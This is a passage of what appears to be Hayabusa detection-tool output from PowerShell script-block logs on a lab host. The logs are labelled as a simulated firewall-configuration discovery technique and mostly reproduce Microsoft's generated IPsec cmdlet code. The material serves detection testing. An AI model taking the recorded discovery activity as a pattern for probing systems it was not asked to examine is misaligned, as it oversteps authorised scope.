[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHas",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"BeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerSh",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] 